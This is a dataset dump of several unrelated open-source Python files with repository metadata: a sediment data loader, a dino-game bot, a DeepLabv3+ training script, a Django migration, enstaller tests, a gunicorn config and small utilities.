sheet_name='Nakdong R.(N11~N14)',header=0,usecols=[3,4,5,6])
df6 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Geum R.(G1~G5)',header=0,usecols=[3,4,5,6,7])
df7 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Yeongsan R.(Y1~Y5)',header=0,usecols=[3,4,5,6,7])
df8 = pd.read_excel('./data/Sediment Yield Field Data set_5 (Seomjin River Watershed)/Data_set-Geum~Seomjin_18May2016.xlsx',
sheet_name='Seomjin R.(S1~S4)',header=0,usecols=[3,4,5,6])
dataList = [df1,df2,df3,df4,df5,df6,df7,df8]
def removeEmpty(dataframe):
df = np.array(dataframe)[3:35]
df = np.delete(df, [2,24], axis=0)
return df
def bedsize(dataframe):
df = dataframe.apply(pd.to_numeric, errors='coerce')
df = np.array(df)[35:43]
dmin = np.nanmin(np.float64(df),axis=0)
dmax = np.nanmax(np.float64(df),axis=0)
dmean = np.nanmean(np.float64(df),axis=0)
return np.vstack((dmin,dmax,dmean))
id_list = []
for l in dataList:
for n in l.columns:
id_list.append(n)
processedDataList = []
for d in dataList:
att = removeEmpty(d)
bed = bedsize(d)
processed_d = np.concatenate((att,bed), axis=0)
processedDataList.append(processed_d)
attri_data = np.hstack((processedDataList[0],processedDataList[1],processedDataList[2],processedDataList[3],
processedDataList[4],processedDataList[5],processedDataList[6],processedDataList[7]))
attri_data = np.transpose(attri_data)
attribute = pd.concat([pd.DataFrame(id_list,columns=['Name']),pd.DataFrame(np.float64(attri_data))],axis=1)
attribute.rename(columns = {0:'Area'}, inplace = True)
attribute = pd.merge(attribute, elev, on='Name')
col_name = ['Name', 'lon', 'lat','Area', 'Avg_slope', 'Perimeter', 'Main_length',
'Tributary_length', 'Total_length', 'Density', 'Width',
'Slope_at_station', 'clay0', 'silt0', 'sand0', 'clay10',
'silt10','sand10', 'clay30','silt30','sand30','clay50',
'silt50','sand50','Urban','Agriculture','Forest',
'Pasture','Wetland','Bare_land','Water','D_min', 'D_max', 'D_mean', 'Elev',"Max_Elev", 'Precip']
attribute.columns = col_name
attribute = attribute.set_index(["Name"])
return attribute
| [
"xboxodx@gmail.com"
] | xboxodx@gmail.com |
b283669dc8927ce0f581ce7103969b38c2b5fbd6 | 6dda5b0e31c931dd3737df11ea31ffd30d6c273c | /auto_dino.py | 2e2fd2e45aa8fb536586b0e282e242746763864f | [] | no_license | RisabhKedai/autodino | 5f4efb0a8fb74eb15ce869689254b94e51bf729d | 774f9713286608a10a2a221f71d1b308bfa29f7b | refs/heads/master | 2022-10-17T04:36:04.724670 | 2020-06-20T11:34:16 | 2020-06-20T11:34:16 | 273,695,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,449 | py | import webbrowser
import pyautogui
import time
import PIL
import sys
#pyautogui.FAILSAFE=False
x1=470.0
x2=520.0
y1,y2=310,330
def hit(key):
pyautogui.press(key)
def collision(tbd):
for i in range(int(x1),int(x2)):
for j in range(y2,y1,-1):
if tbd[i,j]<100:
return True
return False
def bcollision(tbd):
for i in range(int(x1),int(x2)):
for j in range(240,300):
if tbd[i,j]<100:
return True
return False
if __name__=='__main__':
st=time.time()
webbrowser.open_new('https://chromedino.com')
time.sleep(10)
hit('UP')
while True:
image = PIL.ImageGrab.grab().convert('L')
tbd=image.load()
# for i in range(430,470):
# for j in range(25 0,330):
# tbd[i,j]=0
if collision(tbd):
hit('UP')
if bcollision(tbd) and not collision(tbd):
hit('DOWN')
#x1+=0.05 if x1<=780 else 0
x2+=0.05 if x2<=600 else 0
#if time.time()-st>=360:
# break
| [
"noreply@github.com"
] | RisabhKedai.noreply@github.com |
8e3b793faea6b9e1401c3476914c297ccc4552e4 | d4471e4987b79fe1230b2abf8a9a2c8d90549e01 | /train_cityscapes.py | 5d956a7f5b8973c7db076b04e516cce5b52c662c | [
"MIT"
] | permissive | dontLoveBugs/deeplabv3plus_pytorch | fe840f974295fc257915701907fe2b94ebaf8c5e | e9449b69f4a290a080bc48dc54d0fec05196f881 | refs/heads/master | 2020-04-06T23:07:39.301456 | 2018-11-17T06:12:30 | 2018-11-17T06:12:30 | 157,858,894 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,794 | py | import socket
import timeit
from datetime import datetime
import os
import glob
from collections import OrderedDict
import numpy as np
# PyTorch includes
import torch
from torch.autograd import Variable
import torch.optim as optim
from torchvision import transforms
from torch.utils.data import DataLoader
from torchvision.utils import make_grid
# Tensorboard include
from tensorboardX import SummaryWriter
# Custom includes
from dataloaders import cityscapes
from dataloaders import utils
from networks import deeplab_xception, deeplab_resnet
from dataloaders import custom_transforms as tr
gpu_id = 0
print('Using GPU: {} '.format(gpu_id))
# Setting parameters
nEpochs = 100 # Number of epochs for training
resume_epoch = 0 # Default is 0, change if want to resume
p = OrderedDict() # Parameters to include in report
p['trainBatch'] = 4 # Training batch size
testBatch = 4 # Testing batch size
useTest = True # See evolution of the test set when training
nValInterval = 5 # Run on test set every nTestInterval epochs
snapshot = 10 # Store a model every snapshot epochs
p['nAveGrad'] = 1 # Average the gradient of several iterations
p['lr'] = 1e-7 # Learning rate
p['wd'] = 5e-4 # Weight decay
p['momentum'] = 0.9 # Momentum
p['epoch_size'] = 10 # How many epochs to change learning rate
backbone = 'xception' # Use xception or resnet as feature extractor,
save_dir_root = os.path.join(os.path.dirname(os.path.abspath(__file__)))
exp_name = os.path.dirname(os.path.abspath(__file__)).split('/')[-1]
if resume_epoch != 0:
runs = sorted(glob.glob(os.path.join(save_dir_root, 'run', 'run_*')))
run_id = int(runs[-1].split('_')[-1]) if runs else 0
else:
runs = sorted(glob.glob(os.path.join(save_dir_root, 'run', 'run_*')))
run_id = int(runs[-1].split('_')[-1]) + 1 if runs else 0
save_dir = os.path.join(save_dir_root, 'run', 'run_' + str(run_id))
# Network definition
if backbone == 'xception':
net = deeplab_xception.DeepLabv3_plus(nInputChannels=3, n_classes=19, os=16, pretrained=True)
elif backbone == 'resnet':
net = deeplab_resnet.DeepLabv3_plus(nInputChannels=3, n_classes=19, os=16, pretrained=True)
else:
raise NotImplementedError
modelName = 'deeplabv3plus-' + backbone + '-cityscapes'
criterion = utils.cross_entropy2d
if resume_epoch == 0:
print("Training deeplabv3+ from scratch...")
else:
print("Initializing weights from: {}...".format(
os.path.join(save_dir, 'models', modelName + '_epoch-' + str(resume_epoch - 1) + '.pth')))
net.load_state_dict(
torch.load(os.path.join(save_dir, 'models', modelName + '_epoch-' + str(resume_epoch - 1) + '.pth'),
map_location=lambda storage, loc: storage)) # Load all tensors onto the CPU
if gpu_id >= 0:
torch.cuda.set_device(device=gpu_id)
net.cuda()
if resume_epoch != nEpochs:
# Logging into Tensorboard
log_dir = os.path.join(save_dir, 'models', datetime.now().strftime('%b%d_%H-%M-%S') + '_' + socket.gethostname())
writer = SummaryWriter(log_dir=log_dir)
# Use the following optimizer
optimizer = optim.SGD(net.parameters(), lr=p['lr'], momentum=p['momentum'], weight_decay=p['wd'])
p['optimizer'] = str(optimizer)
composed_transforms_tr = transforms.Compose([
tr.RandomHorizontalFlip(),
tr.RandomScale((0.5, 0.75)),
tr.RandomCrop((512, 1024)),
tr.RandomRotate(5),
tr.Normalize_cityscapes(mean=(72.39, 82.91, 73.16)),
tr.ToTensor()])
composed_transforms_ts = transforms.Compose([
tr.RandomHorizontalFlip(),
tr.Scale((819, 1638)),
tr.CenterCrop((512, 1024)),
tr.Normalize_cityscapes(mean=(72.39, 82.91, 73.16)),
tr.ToTensor()])
cityscapes_train = cityscapes.CityscapesSegmentation(split='train',
transform=composed_transforms_tr)
cityscapes_val = cityscapes.CityscapesSegmentation(split='val',
transform=composed_transforms_ts)
cityscapes_test = cityscapes.CityscapesSegmentation(split='test',
transform=composed_transforms_ts)
trainloader = DataLoader(cityscapes_train, batch_size=p['trainBatch'], shuffle=True, num_workers=0)
valloader = DataLoader(cityscapes_val, batch_size=testBatch, shuffle=True, num_workers=0)
testloader = DataLoader(cityscapes_test, batch_size=testBatch, shuffle=False, num_workers=0)
utils.generate_param_report(os.path.join(save_dir, exp_name + '.txt'), p)
num_img_tr = len(trainloader)
num_img_vl = len(valloader)
num_img_ts = len(testloader)
running_loss_tr = 0.0
running_loss_vl = 0.0
running_loss_ts = 0.0
previous_miou = -1.0
aveGrad = 0
global_step = 0
print("Training Network")
# Main Training and Testing Loop
for epoch in range(resume_epoch, nEpochs):
start_time = timeit.default_timer()
if epoch % p['epoch_size'] == p['epoch_size'] - 1:
lr_ = utils.lr_poly(p['lr'], epoch, nEpochs, 0.9)
print('(poly lr policy) learning rate: ', lr_)
optimizer = optim.SGD(net.parameters(), lr=lr_, momentum=p['momentum'], weight_decay=p['wd'])
net.train()
for ii, sample_batched in enumerate(trainloader):
inputs, labels = sample_batched['image'], sample_batched['label']
# Forward-Backward of the mini-batch
inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
global_step += inputs.data.shape[0]
if gpu_id >= 0:
inputs, labels = inputs.cuda(), labels.cuda()
outputs = net.forward(inputs)
loss = criterion(outputs, labels, size_average=False, batch_average=True)
running_loss_tr += loss.item()
# Print stuff
if ii % num_img_tr == (num_img_tr - 1):
running_loss_tr = running_loss_tr / num_img_tr
writer.add_scalar('data/total_loss_epoch', running_loss_tr, epoch)
print('[Epoch: %d, numImages: %5d]' % (epoch, ii * p['trainBatch'] + inputs.data.shape[0]))
print('Loss: %f' % running_loss_tr)
running_loss_tr = 0
stop_time = timeit.default_timer()
print("Execution time: " + str(stop_time - start_time) + "\n")
# Backward the averaged gradient
loss /= p['nAveGrad']
loss.backward()
aveGrad += 1
# Update the weights once in p['nAveGrad'] forward passes
if aveGrad % p['nAveGrad'] == 0:
writer.add_scalar('data/total_loss_iter', loss.item(), ii + num_img_tr * epoch)
optimizer.step()
optimizer.zero_grad()
aveGrad = 0
# Show 10 * 3 images results each epoch
if ii % (num_img_tr // 10) == 0:
grid_image = make_grid(inputs[:3].clone().cpu().data, 3, normalize=True)
writer.add_image('Image', grid_image, global_step)
grid_image = make_grid(
utils.decode_seg_map_sequence(torch.max(outputs[:3], 1)[1].detach().cpu().numpy(), 'cityscapes'), 3,
normalize=False,
range=(0, 255))
writer.add_image('Predicted label', grid_image, global_step)
grid_image = make_grid(
utils.decode_seg_map_sequence(torch.squeeze(labels[:3], 1).detach().cpu().numpy(), 'cityscapes'), 3,
normalize=False, range=(0, 255))
writer.add_image('Groundtruth label', grid_image, global_step)
# One testing epoch
if epoch % nValInterval == (nValInterval - 1):
total_miou = 0.0
net.eval()
for ii, sample_batched in enumerate(valloader):
inputs, labels = sample_batched['image'], sample_batched['label']
# Forward pass of the mini-batch
inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
if gpu_id >= 0:
inputs, labels = inputs.cuda(), labels.cuda()
with torch.no_grad():
outputs = net.forward(inputs)
predictions = torch.max(outputs, 1)[1]
loss = criterion(outputs, labels, size_average=False, batch_average=True)
running_loss_vl += loss.item()
total_miou += utils.get_iou(predictions, labels, 19)
# Print stuff
if ii % num_img_vl == num_img_vl - 1:
miou = total_miou / (ii * testBatch + inputs.data.shape[0])
running_loss_vl = running_loss_vl / num_img_vl
print('Validation:')
print('[Epoch: %d, numImages: %5d]' % (epoch, ii * testBatch + inputs.data.shape[0]))
writer.add_scalar('data/test_loss_epoch', running_loss_vl, epoch)
writer.add_scalar('data/test_miour', miou, epoch)
print('Loss: %f' % running_loss_vl)
print('MIoU: %f\n' % miou)
running_loss_vl = 0
# Save the model
if (epoch % snapshot) == snapshot - 1 and miou > previous_miou:
previous_miou = miou
torch.save(net.state_dict(), os.path.join(save_dir, 'models', modelName + '_epoch-' + str(epoch) + '.pth'))
print("Save model at {}\n".format(
os.path.join(save_dir, 'models', modelName + '_epoch-' + str(epoch) + '.pth')))
writer.close()
if useTest:
total_iou = 0.0
net.eval()
for ii, sample_batched in enumerate(testloader):
inputs, labels = sample_batched['image'], sample_batched['label']
# Forward pass of the mini-batch
inputs, labels = Variable(inputs, requires_grad=True), Variable(labels)
if gpu_id >= 0:
inputs, labels = inputs.cuda(), labels.cuda()
with torch.no_grad():
outputs = net.forward(inputs)
predictions = torch.max(outputs, 1)[1]
loss = criterion(outputs, labels, size_average=False, batch_average=True)
running_loss_ts += loss.item()
total_iou += utils.get_iou(predictions, labels, 19)
# Print stuff
if ii % num_img_ts == num_img_ts - 1:
miou = total_iou / (ii * testBatch + inputs.data.shape[0])
running_loss_ts = running_loss_ts / num_img_ts
print('Test:')
print('Loss: %f' % running_loss_ts)
print('MIoU: %f\n' % miou)
running_loss_ts = 0
| [
"jessezhjf@gmail.com"
] | jessezhjf@gmail.com |
9afd74e8b3a365c8442f1b8b0128e5d4de5e808e | 4eb3e8d29150aa57e6036bc7ca6fcbe169e08c26 | /records/migrations/0013_record_cover_file.py | 8e298e3293b26aa848c7c4f2a9db9d63dd144316 | [] | no_license | GustavAndreasson/records2 | 5b141d7912a2faa40dc9f17d90d5e4e90c249852 | b898c7ed5f8bd652a57facceaa5d2f409c47553d | refs/heads/master | 2023-05-12T16:27:28.602123 | 2023-02-13T19:27:03 | 2023-02-13T19:27:03 | 176,073,447 | 1 | 0 | null | 2023-09-09T15:22:35 | 2019-03-17T08:12:10 | JavaScript | UTF-8 | Python | false | false | 426 | py | # Generated by Django 3.2.10 on 2022-01-28 19:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('records', '0012_auto_20220118_1803'),
]
operations = [
migrations.AddField(
model_name='record',
name='cover_file',
field=models.ImageField(blank=True, null=True, upload_to='records/covers'),
),
]
| [
"gustav.andreasson@gmail.com"
] | gustav.andreasson@gmail.com |
a64f0f99c0ebcacedc4e8efb592d1f75480fcd7c | 0e25329bb101eb7280a34f650f9bd66ed002bfc8 | /tests/functional/test_misc.py | 5da0c776cf8bde4c5a1a3dc58331fff08885b9f3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/enstaller | 2a2d433a3b83bcf9b4e3eaad59d952c531f36566 | 9c9f1a7ce58358b89352f4d82b15f51fbbdffe82 | refs/heads/master | 2023-08-08T02:30:26.990190 | 2016-01-22T17:51:35 | 2016-01-22T17:51:35 | 17,997,072 | 3 | 4 | null | 2017-01-13T19:22:10 | 2014-03-21T23:03:58 | Python | UTF-8 | Python | false | false | 7,200 | py | import json
import os.path
import platform
import shutil
import sys
import tempfile
import textwrap
import mock
import responses
from enstaller import __version__
from enstaller.config import Configuration
from enstaller.history import History
from enstaller.main import main_noexc
from enstaller.utils import PY_VER
from enstaller.tests.common import authenticated_config, mock_index, mock_print, R_JSON_AUTH_RESP
if sys.version_info[0] == 2:
import unittest2 as unittest
else:
import unittest
class TestMisc(unittest.TestCase):
@authenticated_config
@responses.activate
def test_print_config(self):
self.maxDiff = None
# Given
config = Configuration()
config.update(prefix=sys.prefix)
template = textwrap.dedent("""\
Python version: {pyver}
enstaller version: {version}
sys.prefix: {sys_prefix}
platform: {platform}
architecture: {arch}
use_webservice: True
settings:
prefix = {prefix}
repository_cache = {repository_cache}
noapp = False
proxy = None
You are logged in as 'dummy' (David Cournapeau).
Subscription level: Canopy / EPD Basic or above
""")
r_output = template.format(pyver=PY_VER,
sys_prefix=os.path.normpath(sys.prefix),
version=__version__,
platform=platform.platform(),
arch=platform.architecture()[0],
prefix=os.path.normpath(config.prefix),
repository_cache=config.repository_cache)
responses.add(responses.GET,
"https://api.enthought.com/accounts/user/info/",
body=json.dumps(R_JSON_AUTH_RESP))
# When
with self.assertRaises(SystemExit) as e:
with mock_print() as m:
main_noexc(["--config"])
# Then
self.assertEqual(e.exception.code, 0)
self.assertMultiLineEqual(m.value, r_output)
@authenticated_config
def test_list_bare(self):
# Given
sys_prefix = os.path.normpath(sys.prefix)
# When
with mock.patch("enstaller.cli.commands.print_installed"):
with self.assertRaises(SystemExit) as e:
with mock_print() as m:
main_noexc(["--list"])
# Then
self.assertEqual(e.exception.code, 0)
self.assertMultiLineEqual(m.value, "prefix: {0}\n\n".format(sys_prefix))
@authenticated_config
def test_log(self):
with mock.patch("enstaller.cli.commands.History",
spec=History) as mocked_history:
with self.assertRaises(SystemExit) as e:
with mock_print() as m:
main_noexc(["--log"])
self.assertEqual(e.exception.code, 0)
self.assertTrue(mocked_history.return_value.print_log.called)
self.assertMultiLineEqual(m.value, "")
@authenticated_config
def test_freeze(self):
installed_requirements = ["dummy 1.0.0-1", "another_dummy 1.0.1-1"]
with mock.patch("enstaller.cli.commands.get_freeze_list",
return_value=installed_requirements):
with self.assertRaises(SystemExit) as e:
with mock_print() as m:
main_noexc(["--freeze"])
self.assertEqual(e.exception.code, 0)
self.assertMultiLineEqual(m.value,
"dummy 1.0.0-1\nanother_dummy 1.0.1-1\n")
@mock_index({
"fubar-1.0.0-1.egg": {
"available": True,
"build": 1,
"md5": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"mtime": 0.0,
"name": "fubar",
"packages": [],
"product": "nono",
"python": PY_VER,
"size": 0,
"type": "egg",
"version": "1.0.0"
}}, "https://acme.com")
def test_insecure_flag(self):
# Given
responses.add(responses.GET,
"https://acme.com/accounts/user/info/",
body=json.dumps(R_JSON_AUTH_RESP))
config = Configuration()
config.update(store_url="https://acme.com")
config.update(auth=("nono", "le gros robot"))
# When
with self.assertRaises(SystemExit) as e:
with mock.patch("enstaller.main._ensure_config_or_die",
return_value=config):
with mock.patch(
"enstaller.main.ensure_authenticated_config"
):
main_noexc(["-s", "fubar"])
# Then
self.assertEqual(e.exception.code, 0)
# When
with self.assertRaises(SystemExit) as e:
with mock.patch("enstaller.main._ensure_config_or_die",
return_value=config):
with mock.patch(
"enstaller.main.ensure_authenticated_config"
):
main_noexc(["-ks", "fubar"])
# Then
self.assertEqual(e.exception.code, 0)
class TestPrefix(unittest.TestCase):
def setUp(self):
self.prefix = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.prefix)
@authenticated_config
@mock_index({
"fubar-1.0.0-1.egg": {
"available": True,
"build": 1,
"md5": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"mtime": 0.0,
"name": "fubar",
"packages": [],
"product": "nono",
"python": PY_VER,
"size": 0,
"type": "egg",
"version": "1.0.0"
}}, "https://api.enthought.com")
def test_simple(self):
self.maxDiff = None
# Given
responses.add(responses.GET,
"https://api.enthought.com/accounts/user/info/",
body=json.dumps(R_JSON_AUTH_RESP))
template = textwrap.dedent("""\
Python version: {pyver}
enstaller version: {version}
sys.prefix: {sys_prefix}
platform: {platform}
architecture: {arch}
use_webservice: True
settings:
prefix = {prefix}
repository_cache = {repository_cache}
noapp = False
proxy = None
You are logged in as 'dummy' (David Cournapeau).
Subscription level: Canopy / EPD Basic or above
""")
r_output = template.format(pyver=PY_VER,
sys_prefix=os.path.normpath(sys.prefix),
version=__version__,
platform=platform.platform(),
arch=platform.architecture()[0],
prefix=os.path.normpath(self.prefix),
repository_cache=os.path.join(self.prefix,
"LOCAL-REPO"))
# When
with self.assertRaises(SystemExit):
with mock_print() as m:
main_noexc(["--config", "--prefix={0}".format(self.prefix)])
# Then
self.assertEqual(m.value, r_output)
| [
"cournape@gmail.com"
] | cournape@gmail.com |
f9fd59e42615ba9ba02c202ac091a413ca692229 | 6a07d4c96f6011c025810cd4059a3d47c60948e3 | /cap5/identificar_elementos_duplicados_em_vetor.py | 7c55c18e554d90d1c3bde4490840e7255a9ace5e | [] | no_license | redbillb/devfuria | a16e2f4dd661d42eead279f645aca3f4057623c8 | cf3c1565b8e85418acab5ca5c11576502cc63566 | refs/heads/master | 2020-03-23T15:39:01.713588 | 2018-08-28T22:15:37 | 2018-08-28T22:15:37 | 141,764,363 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # -*- coding: utf-8 -*-
#imports
#processamento
def ahDuplicidade(vetor):
resultado = False
contador = 0
for elemento in vetor:
contador += 1
for indice in range(contador, len(vetor)):
if vetor[indice] == elemento:
resultado = True
return resultado
#testes
assert ahDuplicidade([100, 200, 300, 300, 400])
assert not ahDuplicidade([100, 200, 300, 400]) | [
"redbillb@gmail.com"
] | redbillb@gmail.com |
66126674f51734a6eecd06e9abdf48bdc490a413 | 63c9111bbeadea8d6313dbca5853b8203ffbda21 | /templates/data/gunicorn.production.conf.py | d13a36301f39a5533a004f0f91f075671296787f | [] | no_license | heavenshell/py-gene-script | 453969279fe45d1f3d94ee10711a6bf7e35b2ea2 | 912941406a1bc54139b2347cb748940a055cdd05 | refs/heads/master | 2020-12-24T06:30:22.603432 | 2017-07-16T21:05:37 | 2017-07-16T21:05:37 | 40,977,353 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,398 | py | import os
import multiprocessing
# Sample Gunicorn configuration file.
#
# Server socket
#
# bind - The socket to bind.
#
# A string of the form: 'HOST', 'HOST:PORT', 'unix:PATH'.
# An IP is a valid HOST.
#
# backlog - The number of pending connections. This refers
# to the number of clients that can be waiting to be
# served. Exceeding this number results in the client
# getting an error when attempting to connect. It should
# only affect servers under significant load.
#
# Must be a positive integer. Generally set in the 64-2048
# range.
#
bind = '127.0.0.1:8000'
backlog = 2048
#
# Worker processes
#
# workers - The number of worker processes that this server
# should keep alive for handling requests.
#
# A positive integer generally in the 2-4 x $(NUM_CORES)
# range. You'll want to vary this a bit to find the best
# for your particular application's work load.
#
# worker_class - The type of workers to use. The default
# async class should handle most 'normal' types of work
# loads. You'll want to read http://gunicorn/deployment.hml
# for information on when you might want to choose one
# of the other worker classes.
#
# An string referring to a 'gunicorn.workers' entry point
# or a MODULE:CLASS pair where CLASS is a subclass of
# gunicorn.workers.base.Worker. The default provided values
# are:
#
# egg:gunicorn#sync
# egg:gunicorn#eventlet - Requires eventlet >= 0.9.7
# egg:gunicorn#gevent - Requires gevent >= 0.12.2 (?)
# egg:gunicorn#tornado - Requires tornado >= 0.2
#
# worker_connections - For the eventlet and gevent worker classes
# this limits the maximum number of simultaneous clients that
# a single process can handle.
#
# A positive integer generally set to around 1000.
#
# timeout - If a worker does not notify the master process in this
# number of seconds it is killed and a new worker is spawned
# to replace it.
#
# Generally set to thirty seconds. Only set this noticeably
# higher if you're sure of the repercussions for sync workers.
# For the non sync workers it just means that the worker
# process is still communicating and is not tied to the length
# of time required to handle a single request.
#
# keepalive - The number of seconds to wait for the next request
# on a Keep-Alive HTTP connection.
#
# A positive integer. Generally set in the 1-5 seconds range.
#
worker_class = 'egg:meinheld#gunicorn_worker'
workers = multiprocessing.cpu_count() * 2 + 1
worker_connections = 1000
timeout = 30
keepalive = 2
#
# Debugging
#
# debug - Turn on debugging in the server. This limits the number of
# worker processes to 1 and changes some error handling that's
# sent to clients.
#
# True or False
#
# spew - Install a trace function that spews every line of Python
# that is executed when running the server. This is the
# nuclear option.
#
# True or False
#
debug = False
spew = False
#
# Server mechanics
#
# daemon - Detach the main Gunicorn process from the controlling
# terminal with a standard fork/fork sequence.
#
# True or False
#
# pidfile - The path to a pid file to write
#
# A path string or None to not write a pid file.
#
# user - Switch worker processes to run as this user.
#
# A valid user id (as an integer) or the name of a user that
# can be retrieved with a call to pwd.getpwnam(value) or None
# to not change the worker process user.
#
# group - Switch worker process to run as this group.
#
# A valid group id (as an integer) or the name of a user that
# can be retrieved with a call to pwd.getgrnam(value) or None
# to change the worker processes group.
#
# umask - A mask for file permissions written by Gunicorn. Note that
# this affects unix socket permissions.
#
# A valid value for the os.umask(mode) call or a string
# compatible with int(value, 0) (0 means Python guesses
# the base, so values like "0", "0xFF", "0022" are valid
# for decimal, hex, and octal representations)
#
# tmp_upload_dir - A directory to store temporary request data when
# requests are read. This will most likely be disappearing soon.
#
# A path to a directory where the process owner can write. Or
# None to signal that Python should choose one on its own.
#
daemon = False
pidfile = None
umask = 0
user = None
group = None
tmp_upload_dir = None
#
# Logging
#
# logfile - The path to a log file to write to.
#
# A path string. "-" means log to stdout.
#
# loglevel - The granularity of log output
#
# A string of "debug", "info", "warning", "error", "critical"
#
logfile = '-'
loglevel = 'info'
root_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
log_path = os.path.join(root_path, 'logs')
accesslog = '-'
# accesslog = '{0}/access_log'.format(log_path)
# access_log_format = '"%(h)s %(l)s %(u)s [%(t)s] "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s" "%(p)s" %(T)s %(D)s' # noqa
#
# Process naming
#
# proc_name - A base to use with setproctitle to change the way
# that Gunicorn processes are reported in the system process
# table. This affects things like 'ps' and 'top'. If you're
# going to be running more than one instance of Gunicorn you'll
# probably want to set a name to tell them apart. This requires
# that you install the setproctitle module.
#
# A string or None to choose a default of something like 'gunicorn'.
#
proc_name = None
#
# Server hooks
#
# post_fork - Called just after a worker has been forked.
#
# A callable that takes a server and worker instance
# as arguments.
#
# pre_fork - Called just prior to forking the worker subprocess.
#
# A callable that accepts the same arguments as after_fork
#
# pre_exec - Called just prior to forking off a secondary
# master process during things like config reloading.
#
# A callable that takes a server instance as the sole argument.
def post_fork(server, worker):
server.log.info("Worker spawned (pid: %s)" % worker.pid)
def pre_fork(server, worker):
pass
def pre_exec(server):
server.log.info("Forked child, re-executing.")
| [
"heavenshell.jp@gmail.com"
] | heavenshell.jp@gmail.com |
6ffbc1fdd0bb94c69f961871e05b86e073a589d5 | e0ed932fc2e4edb953cc4e423362dabc19083008 | /python/sanic_learn/docs/learn_conf.py | 3b279281ff746c4e709cfdd6e544322a6b2da803 | [] | no_license | glfAdd/note | 90baee45003ac3998d898dcfbc618caa28f33b74 | 19a9aff61450be25904bff0fe672f660d49d90ff | refs/heads/main | 2023-05-27T13:28:36.092352 | 2023-05-24T03:35:58 | 2023-05-24T03:35:58 | 240,066,208 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | """ ============================ config
config对象实现两个__getattr__和__setattr__
方式1: 使用属性
app = Sanic('myapp')
app.config.DB_NAME = 'appdb'
app.config.DB_USER = 'appuser'
方式2: 使用update
db_settings = {
'DB_HOST': 'localhost',
'DB_NAME': 'appdb',
'DB_USER': 'appuser'
}
app.config.update(db_settings)
"""
| [
"2239660080@qq.com"
] | 2239660080@qq.com |
1f13d9477491556fd62ba54954608accdb6306a6 | fa6ec0272b6294023556d397c5d00b58bf7d922d | /apps.py | ee611e203020784edbd558eece0fde3ea36a7c1e | [] | no_license | ernestby/django-menu | e6ef6beddedcbd2041f7cbec8a67bf2133591b2a | 00cca6ca0ceb51e216d8c1532be0c66afd40429a | refs/heads/master | 2021-01-16T01:02:15.512270 | 2015-04-30T08:48:26 | 2015-04-30T08:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class MenuConfig(AppConfig):
name = 'apps.menu'
label = 'tree_menu'
verbose_name = _('Menu')
| [
"stanislav@baltrunas.ru"
] | stanislav@baltrunas.ru |
8f0295c144b5b11a32f9c500b1e5ab6d61379ddf | 0acc183986e6ec1aff3e64fdd296766fbde5692f | /array_format.py | a45a318457e2695542f76e09a863fac7dd59ec3b | [] | no_license | kkinnard/Concussion-App-Data-Mining | 0347cb265cfcf593961f01339b2441dea5a63f1d | 87c1c65820b2b3a55552b7c5f5bbc93e82ede5ae | refs/heads/master | 2021-01-10T08:28:33.433319 | 2016-02-27T16:37:01 | 2016-02-27T16:37:01 | 43,262,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,122 | py | # Format the arrays to ints and the values that we are looking at.
#!/usr/bin/python
def cont_format(cont_list, cont_rows, cont_columns):
cont_format_list = [[0] * cont_columns for count in range(cont_rows)]
# Age of the participant
for i in range(1, cont_rows + 1):
cont_format_list[i - 1][0] = int(cont_list[i][2])
# Gender of the participant
for j in range(1, cont_rows + 1):
cont_format_list[j - 1][1] = int(cont_list[j][3])
# Rest of the data
for k in range(1, cont_rows + 1):
for l in range(2, 10):
cont_format_list[k - 1][l] = int(cont_list[k][l + 3])
return cont_format_list
def conc_format(conc_list, conc_rows, conc_columns):
conc_format_list = [[0] * conc_columns for count in range(conc_rows)]
#Age of the participant
for i in range(1, conc_rows + 1):
conc_format_list[i - 1][0] = int(conc_list[i][2])
#Gender of the participant
for j in range(1, conc_rows + 1):
conc_format_list[j - 1][1] = int(conc_list[j][4])
#Rest of the data
for k in range(1, conc_rows + 1):
for l in range(2, 10):
conc_format_list[k - 1][l] = int(conc_list[k][l + 3])
return conc_format_list
| [
"amunch@nd.edu"
] | amunch@nd.edu |
af69d10cfc7875b0e05f73d045baae296ecc6cf3 | 9722af919f6660489c546811518f73a6285ef0b9 | /venv/bin/pip3.8 | fc299fae7ce1c3972abddd846a4850891a85e9a2 | [] | no_license | back-hub/parser_example | aadfaccde96a567f45fb29faf29f01ef774cffd5 | b8fdb8c6eb391e369c1d3cc907c2e3bd8d0e3b68 | refs/heads/master | 2023-06-02T00:38:40.922169 | 2021-06-17T04:50:51 | 2021-06-17T04:50:51 | 377,707,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | 8 | #!/home/backhub/PycharmProjects/dummy_parser/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"tamirlan.akhmedov@gmail.com"
] | tamirlan.akhmedov@gmail.com |
